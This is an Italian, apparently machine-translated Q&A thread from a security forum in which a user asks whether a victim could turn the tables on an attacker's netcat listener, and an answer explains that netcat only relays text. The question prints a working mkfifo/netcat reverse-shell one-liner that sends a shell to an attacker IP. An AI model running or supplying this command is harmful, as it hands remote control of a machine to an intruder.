Possibile backdoor di un listener Netcat?

1

Sono entrato nei computer e nei server backdooring utilizzando un software specializzato o qualche comando malevolo che genera una backdoor sul computer di destinazione, quindi invia il terminale alla mia sessione di ascolto netcat sul mio server.

Anche se questo è un campo interessante, per vedere quanto sia facile fare quel tipo di cose, ho avuto una certa curiosità nel tentare di fare qualcos'altro.

Mi stavo chiedendo la possibilità di generare una backdoor sul server che sta ascoltando su una porta usando Netcat. Preferibilmente una macchina Linux. Il comando dovrebbe assomigliare a qualcosa del tipo:

root@ubuntu:~# nc -lvk 9000
Listening on [0.0.0.0] (family 0, port 9000)

Questo è in pratica l'aspetto del server dell'attaccante. Quindi dì che stava aspettando su una backdoor per deporre le uova sulla macchina della sua vittima. La vittima avrebbe eseguito alcuni comandi sulla sua macchina Linux come:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 9000 >/tmp/f

Supponendo che l'indirizzo IP 10.0.0.1 sia l'IP dell'attaccante. A questo punto, l'attaccante (dopo che la vittima ha eseguito questo comando malevolo), vedrebbe questo:

root@ubuntu:~# nc -lvk 9000
Listening on [0.0.0.0] (family 0, port 9000)
$

e da lì l'attaccante ha ora un terminale che viene convogliato sul suo server dalla vittima.

Come potrei abusare di questo, e invece della vittima che invia una shell all'attaccante, in che modo la vittima può backdoor la porta aperta dell'attaccante (9000) che sta usando Netcat?

    
posta BlackVikingPro 14.03.2017 - 18:03
fonte

1 risposta

2

No, mentre lo descrivi, questo non funzionerà. netcat -lnvp non dovrebbe eseguire alcun comando. È solo un lato di una chat testuale.  Come mostri, devi agganciare quei messaggi a una shell che farà qualcosa con quel testo piping la shell su netcat.

A meno che non ci sia una vulnerabilità sulla macchina dell'attaccante, la vittima può solo inviare del testo. Una vulnerabilità sarebbe netcat che esegue un comando nel testo che viene inviato o che l'utente malintenzionato utilizza uno script per gestire l'output netcat che è vulnerabile al comando di iniezione.

    
risposta data 14.03.2017 - 18:35
fonte

Leggi altre domande sui tag